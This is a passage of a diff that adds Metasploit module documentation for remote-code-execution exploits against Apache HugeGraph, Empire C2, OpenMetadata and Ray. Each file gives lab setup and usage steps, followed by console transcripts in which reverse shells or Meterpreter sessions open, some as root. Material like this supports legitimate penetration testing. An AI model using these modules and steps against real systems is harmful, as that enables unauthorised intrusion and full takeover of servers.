+[-] 192.168.56.6:80 - LOGIN FAILED: test:strongpasswordcannotguess (Incorrect)
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,46 @@
+## Vulnerable Application
+This module exploits CVE-2024-27348 which is a Remote Code Execution (RCE) vulnerability that exists in
+Apache HugeGraph Server in versions before 1.3.0. An attacker can bypass the sandbox restrictions and achieve
+RCE through Gremlin, resulting in complete control over the server
+
+### Setup
+To install a vulnerable instance via docker run the following command:
+```
+docker run -itd --name=graph -p 8080:8080 hugegraph/hugegraph:1.0.0
+```
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/linux/http/apache_hugegraph_gremlin_rce`
+1. Set the `RHOST` and `LHOST` options
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### Apache HugeGraph 1.0.0 docker instance
+```
+
+msf6 exploit(linux/http/apache_hugegraph_gremlin_rce) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 exploit(linux/http/apache_hugegraph_gremlin_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(linux/http/apache_hugegraph_gremlin_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Apache HugeGraph version detected: 1.0.0
+[*] 127.0.0.1:9191 - Executing Automatic Target for cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (3045380 bytes) to 172.16.199.1
+[*] Meterpreter session 8 opened (172.16.199.1:4444 -> 172.16.199.1:53803) at 2024-07-29 13:59:20 -0700
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 11.4 (Linux 6.6.32-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,327 @@
+## Vulnerable Application
+This module exploits a directory traversal vulnerability in both
+BC-SECURITY/Empire C2 Framework (<5.9.3) and ProjectEmpire/Empire (<f030cf62) and
+writes the payload to /tmp/ directory followed by a cron.d file to execute the payload.
+
+The vulnerability affects:
+
+    * BC-SECURITY/Empire C2 Framework (<5.9.3)
+    * ProjectEmpire/Empire (<f030cf62)
+
+This module was successfully tested on:
+
+    * BC-SECURITY/Empire C2 Framework (v5.9.2) on Kali Linux 6.6.15
+    * BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15
+    * ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15
+
+
+### Install and run the vulnerable Empire
+#### BC-SECURITY/Empire
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Kali Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Empire docker container (<5.9.3) in your VM.
+   `docker pull bcsecurity/empire:v5.9.2`
+4. Run the server and the client on the same VM.
+5. Run the server.
+
+`docker run -it --net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d bcsecurity/empire:v5.9.2`
+(`--net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d` is not realistic but for simplicity
+ and payload will be loaded in host not in container) or
+```
+docker run -it --net="host" bcsecurity/empire:v5.9.2
+docker exec -it <server container id> bash
+apt update
+apt install cron
+cron
+```
+\(Payload will be loaded in container but you have to manually set up cron on container.)
+
+6. Run the client.
+`docker run -it --net="host" bcsecurity/empire:v5.9.2 client`
+7. Execute Empire listener on client.
+```bash
+uselistener http
+set Host <rhost>
+set Port <port>
+execute
+```
+
+#### ProjectEmpire/Empire
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Kali Linux (or other Linux distro) in your virtualization engine.
+3. Clone empire.
+`git clone https://github.com/EmpireProject/Empire.git`
+4. `cd Empire`
+5. `git checkout 03ca7bdbcc81457da8e8c1419b36adf66fe9b110`
+6. `docker pull empireproject/empire`
+7. `docker run -it --net="host" -v $(pwd):/opt/Empire -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d empireproject/empire /bin/bash`
+
+(Payload will be loaded in host not in container.) or
+```
+docker run -it --net="host" empireproject/empire /bin/bash
+cron
+```
+(Payload will be loaded in container but you have to manually set up cron on container.)
+
+8. `cd setup`
+9. `./reset.sh` (Empire start)
+10. Execute listener.
+```bash
+listeners
+set Host <rhost>
+set Port <port>
+run
+```
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/empire_skywalker`
+4. Do: `set rhost <rhost>`
+5. Do: `set rport <port>`
+6. Do: `set lhost <attacker-ip>`
+7. Optional: `set CVE <cve>`
+8. Do: `run`
+9. Have the generated request processed by a vulnerable version of Empire
+10. You should get a shell or meterpreter
+
+
+## Options
+
+###  TARGETURI (optional)
+
+This is the Base URI path. This is used when CVE is set to `Original`. Default is `/`.
+
+### STAGE0_URI (required)
+
+This is the URI path requested by the initial launcher. This is used when CVE is set to `Original`. Default is `index.asp`.
+
+### STAGE1_URI (required)
+
+This is the URI path used by the RSA key post. This is used when CVE is set to `Original`. Default is `index.jsp`
+
+### PROFILE (optional)
+
+This is Empire agent traffic profile URI. This is used when CVE is set to `Original`.
+
+### CVE (required)
+
+This is the vulnerability to use. Default is `CVE-2024-6127`, but `Original` can also be chosen.
+
+### STAGE_PATH (required)
+
+This is the Empire's default staging path. This is used when CVE is set to `CVE-2024-6127`. Default is `login/process.php`.
+([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169))
+
+### PROFILE (required)
+
+This is the Empire's default communication profile agent.  This is used when CVE is set to `CVE-2024-6127`.
+Default is `Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko`
+([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169))
+
+
+## Scenarios
+### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 0, port 80)
+```
+msf6 > use exploit/linux/http/empire_skywalker
+[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.7
+rhost => 192.168.56.7
+msf6 exploit(linux/http/empire_skywalker) > set rport 80
+rport => 80
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.7:80 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/NYLkIKRK
+[*] Writing cron job to /etc/cron.d/AeVTTPiZ
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (24772 bytes) to 192.168.56.7
+[+] Deleted /etc/cron.d/AeVTTPiZ
+[+] Deleted /tmp/NYLkIKRK
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:48026) at 2024-07-20 11:32:03 +0900
+[!] This exploit may require manual cleanup of '/var/lib/powershell-empire/empire/server/downloads/LML47FWS/agent.log' on the target
+
+meterpreter > sysinfo
+Computer        : kali
+OS              : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+```
+
+### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
+```
+msf6 > use exploit/linux/http/empire_skywalker
+[*] Using configured payload linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/empire_skywalker) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > set target 1
+target => 1
+msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
+payload => linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.6:8080 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/jJzYkeKV
+[*] Writing cron job to /etc/cron.d/nFnFIbim
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (36 bytes) to 192.168.56.6
+[+] Deleted /etc/cron.d/nFnFIbim
+[+] Deleted /tmp/jJzYkeKV
+[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/WV9TEJTE/agent.log, unknown result
+[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:42068) at 2024-07-20 14:40:09 +0900
+
+whoami
+root
+```
+
+### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
+```
+msf6 > use exploit/linux/http/empire_skywalker
+[*] Using configured payload linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/empire_skywalker) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > set target 2
+target => 2
+msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
+payload => linux/x64/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.6:8080 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/qxlOSIYF
+[*] Writing cron job to /etc/cron.d/ugrYIJzf
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (38 bytes) to 192.168.56.6
+[+] Deleted /etc/cron.d/ugrYIJzf
+[+] Deleted /tmp/qxlOSIYF
+[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/JJR8EMKK/agent.log, unknown result
+[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:46040) at 2024-07-20 14:44:09 +0900
+
+whoami
+root
+```
+
+### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 0, port 8080)
+```
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/empire_skywalker) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > set CVE Original 
+CVE => Original
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.6:8080 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/PSDaqPOJ
+[*] Writing cron job to /etc/cron.d/KQlwBZQk
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (24772 bytes) to 192.168.56.6
+[+] Deleted /etc/cron.d/KQlwBZQk
+[+] Deleted /tmp/PSDaqPOJ
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:38552) at 2024-07-24 18:01:04 +0900
+[!] This exploit may require manual cleanup of '/agent.log' on the target
+
+meterpreter > sysinfo
+Computer        : kali
+OS              : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```
+
+### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
+```
+msf6 > use exploit/linux/http/empire_skywalker
+[*] Using configured payload linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/empire_skywalker) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > set CVE Original
+CVE => Original
+msf6 exploit(linux/http/empire_skywalker) > set target 1
+target => 1
+msf6 exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
+payload => linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.6:8080 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/VzTAquhE
+[*] Writing cron job to /etc/cron.d/LjvThMOu
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (36 bytes) to 192.168.56.6
+[+] Deleted /etc/cron.d/LjvThMOu
+[+] Deleted /tmp/VzTAquhE
+[!] Tried to delete /agent.log, unknown result
+[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:47140) at 2024-07-24 18:06:08 +0900
+
+whoami
+root
+```
+
+### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
+```
+msf6 > use exploit/linux/http/empire_skywalker
+[*] Using configured payload linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/empire_skywalker) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/empire_skywalker) > set cve Original
+cve => Original
+msf6 exploit(linux/http/empire_skywalker) > set target 2
+target => 2
+msf6 exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
+payload => linux/x64/shell/reverse_tcp
+msf6 exploit(linux/http/empire_skywalker) > check
+[*] 192.168.56.6:8080 - The target appears to be vulnerable.
+msf6 exploit(linux/http/empire_skywalker) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Successfully negotiated an artificial Empire agent
+[*] Writing payload to /tmp/uuTqlfDp
+[*] Writing cron job to /etc/cron.d/frDtYnmD
+[*] Waiting for cron job to run, can take up to 60 seconds
+[*] Sending stage (38 bytes) to 192.168.56.6
+[+] Deleted /etc/cron.d/frDtYnmD
+[+] Deleted /tmp/uuTqlfDp
+[!] Tried to delete /agent.log, unknown result
+[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:51566) at 2024-07-24 18:08:08 +0900
+
+whoami
+root
+```
@@ -0,0 +1,166 @@
+## Vulnerable Application
+
+OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository,
+in-depth lineage, and seamless team collaboration.
+This module chains two vulnerabilities that exist in the OpenMetadata application.
+The first vulnerability, [CVE-2024-28255](https://nvd.nist.gov/vuln/detail/CVE-2024-28255), bypasses the API authentication
+using JWT tokens. It misuses the `JwtFilter` that checks the path of url endpoint against a list of excluded endpoints
+that does not require authentication.
+Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings that will match the
+excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the
+authentication mechanism and reach any arbitrary endpoint.
+By chaining this vulnerability with [CVE-2024-28254](https://nvd.nist.gov/vuln/detail/CVE-2024-28254), that allows for
+arbitrary SpEL injection at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`,attackers are able
+to run arbitrary commands using Java classes such as `java.lang.Runtime` without any authentication.
+
+OpenMetadata versions `1.2.3` and below are vulnerable.
+
+The following releases were tested.
+* OpenMetadata 1.2.3 on Docker
+
+## Installation steps to install the OpenMedata running on Docker
+* Please follow these [installation instructions](https://docs.open-metadata.org/v1.3.x/quick-start/local-docker-deployment).
+* Please ensure that you download version 1.2.3 or below.
+* After successful installation your should be able to access OpenMetadata on port 8585 at `http://your_openmetadata_ip:8585`.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/openmetadata_auth_bypass_rce`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ]  `set lhost <attacker-ip>`
+- [ ] `set target <0=Unix Command, 1=Linux Dropper>`
+- [ ] `exploit`
+- [ ] you should get a `reverse netcat shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+No specific options
+
+## Scenarios
+```msf
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > info
+
+       Name: OpenMetadata authentication bypass and SpEL injection exploit chain
+     Module: exploit/linux/http/openmetadata_auth_bypass_rce
+   Platform: Unix, Linux
+       Arch: cmd
+ Privileged: No
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-03-15
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Alvaro Muñoz alias pwntester (https://github.com/pwntester)
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Automatic
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
+                                        html
+  RPORT      8585             yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  TARGETURI  /                yes       The URI path of the OpenMetadata web application
+  VHOST                       no        HTTP server virtual host
+
+Payload information:
+
+Description:
+  OpenMetadata is a unified platform for discovery, observability, and governance powered
+  by a central metadata repository, in-depth lineage, and seamless team collaboration.
+  This module chains two vulnerabilities that exist in the OpenMetadata aplication.
+  The first vulnerability, CVE-2024-28255, bypasses the API authentication using JWT tokens.
+  It misuses the `JwtFilter` that checks the path of the url endpoint against a list of excluded
+  endpoints that does not require authentication. Unfortunately, an attacker may use Path Parameters
+  to make any path contain any arbitrary strings that will match the excluded endpoint condition
+  and therefore will be processed with no JWT validation allowing an attacker to bypass the
+  authentication mechanism and reach any arbitrary endpoint.
+  By chaining this vulnerability with CVE-2024-28254, that allows for arbitrary SpEL injection
+  at endpoint `/api/v1/events/subscriptions/validation/condition/<expression>`, attackers
+  are able to run arbitrary commands using Java classes such as `java.lang.Runtime` without any
+  authentication.
+  OpenMetadata versions `1.2.3` and below are vulnerable.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-28255
+  https://nvd.nist.gov/vuln/detail/CVE-2024-28254
+A  https://securitylab.github.com/advisories/GHSL-2023-235_GHSL-2023-237_Open_Metadata/
+  https://attackerkb.com/topics/f19fXpZn62/cve-2024-28255
+  https://ethicalhacking.uk/unmasking-cve-2024-28255-authentication-bypass-in-openmetadata/
+
+
+View the full module info with the info -d command.
+```
+### OpenMetadata 1.2.3 Automatic - cmd/unix/reverse_netcat_gaping
+```msf
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload cmd/unix/reverse_netcat_gaping
+payload => cmd/unix/reverse_netcat_gaping
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set rhosts 192.168.201.42
+rhosts => 192.168.201.42
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of OpenMetadata.
+[+] The target is vulnerable. Version 1.2.3
+[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
+[*] Command shell session 17 opened (192.168.201.8:4444 -> 192.168.201.42:55160) at 2024-07-29 15:27:38 +0000
+
+id
+uid=1000(openmetadata) gid=1000(openmetadata) groups=1000(openmetadata)
+pwd
+/opt/openmetadata
+uname -a
+Linux 1e3c578a0acc 6.6.32-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Jun 13 14:14:43 UTC 2024 x86_64 Linux
+```
+### OpenMetadata 1.2.3 Automatic - cmd/linux/http/x64/meterpreter/reverse_tcp
+```msf
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/openmetadata_auth_bypass_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of OpenMetadata.
+[+] The target is vulnerable. Version 1.2.3
+[*] Executing Automatic for cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (3045380 bytes) to 192.168.201.42
+[*] Meterpreter session 11 opened (192.168.201.8:4444 -> 192.168.201.42:50599) at 2024-07-31 14:31:37 +0000
+
+meterpreter > getuid
+Server username: openmetadata
+meterpreter > sysinfo
+Computer     : 172.16.240.4
+OS           :  (Linux 6.6.32-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/opt/openmetadata
+meterpreter >
+```
+## Limitations
+No limitations.
@@ -0,0 +1,103 @@
+## Vulnerable Application
+
+Ray (<=v2.6.3) is vulnerable to RCE via the agent job submission endpoint (CVE-2023-48022)
+
+The vulnerability affects:
+
+    * Ray (<=v2.6.3)
+
+This module was successfully tested on:
+
+    * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15
+
+### Install and run the vulnerable Ray (v2.6.3)
+
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Kali Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Ray docker container (v2.6.3) in your VM.
+   `docker pull rayproject/ray:2.6.3`
+4. Start the ray container.
+   `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3`
+5. Start ray.
+   `ray start --head --dashboard-host=0.0.0.0`
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/ray_agent_job_rce`
+4. Do: `set rhost <rhost>`
+5. Do: `set lhost <attacker-ip>`
+6. Do: `run`
+7. You should get a shell or meterpreter
+
+## Options
+No options
+
+## Scenarios
+
+### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0)
+```
+msf6 > use exploit/linux/http/ray_agent_job_rce
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/ray_agent_job_rce) > check
+[*] 192.168.56.6:8265 - The service is running, but could not be validated.
+msf6 exploit(linux/http/ray_agent_job_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[+] Command execution successful. Job ID: 'raysubmit_EJDSK2BrhAP8j69n' Submission ID: 'raysubmit_EJDSK2BrhAP8j69n'
+[*] Using URL: http://192.168.56.1:8080/kOZWO5HA3wWm2Hh
+[*] Command Stager progress - 100.00% done (120/120 bytes)
+[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /kOZWO5HA3wWm2Hh
+[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
+[*] Sending stage (3045380 bytes) to 192.168.56.6
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:42052) at 2024-08-10 10:45:48 +0900
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Ubuntu 20.04 (Linux 6.6.15-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1)
+```
+msf6 > use exploit/linux/http/ray_agent_job_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/ray_agent_job_rce) > set target 1
+target => 1
+msf6 exploit(linux/http/ray_agent_job_rce) > set payload linux/x86/shell/reverse_tcp
+payload => linux/x86/shell/reverse_tcp
+msf6 exploit(linux/http/ray_agent_job_rce) > check
+[*] 192.168.56.6:8265 - The service is running, but could not be validated.
+msf6 exploit(linux/http/ray_agent_job_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[+] Command execution successful. Job ID: 'raysubmit_RNpiJJt2feNrUrwN' Submission ID: 'raysubmit_RNpiJJt2feNrUrwN'
+[*] Using URL: http://192.168.56.1:8080/QtpKXmqA8kq
+[*] Command Stager progress - 100.00% done (116/116 bytes)
+[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /QtpKXmqA8kq
+[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
+[*] Sending stage (36 bytes) to 192.168.56.6
+[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:35136) at 2024-08-10 10:47:37 +0900
+[*] Server stopped.
+
+whoami
+ray
+pwd
+/home/ray
+```
@@ -0,0 +1,103 @@
+## Vulnerable Application
+
+Ray (<=v2.6.3) is vulnerable to RCE via cpu_profile command injection vulnerability (CVE-2023-6019)
+
+The vulnerability affects:
+
+    * Ray (<=v2.6.3)
+
+This module was successfully tested on:
+
+    * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15
+
+### Install and run the vulnerable Ray (v2.6.3)
+
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Kali Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Ray docker container (v2.6.3) in your VM.
+   `docker pull rayproject/ray:2.6.3`
+4. Start the ray container.
+   `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3`
+5. Start ray.
+   `ray start --head --dashboard-host=0.0.0.0`
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019`
+4. Do: `set rhost <rhost>`
+5. Do: `set lhost <attacker-ip>`
+6. Do: `run`
+7. You should get a shell or meterpreter
+
+## Options
+No options
+
+## Scenarios
+
+### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0)
+```
+msf6 > use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > check
+[*] 192.168.56.6:8265 - The service is running, but could not be validated.
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[+] Grabbed node info, pid: 129, ip: 172.17.0.2
+[*] Using URL: http://192.168.56.1:8080/2W4ZJ30NqjnfoGE
+[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /2W4ZJ30NqjnfoGE
+[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
+[*] Sending stage (3045380 bytes) to 192.168.56.6
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:59072) at 2024-08-10 10:29:05 +0900
+[*] Command Stager progress - 100.00% done (120/120 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Ubuntu 20.04 (Linux 6.6.15-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1)
+```
+msf6 > use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set rhost 192.168.56.6
+rhost => 192.168.56.6
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set target 1
+target => 1
+msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set payload linux/x86/shell/reverse_tcp
+payload => linux/x86/shell/reverse_tcp
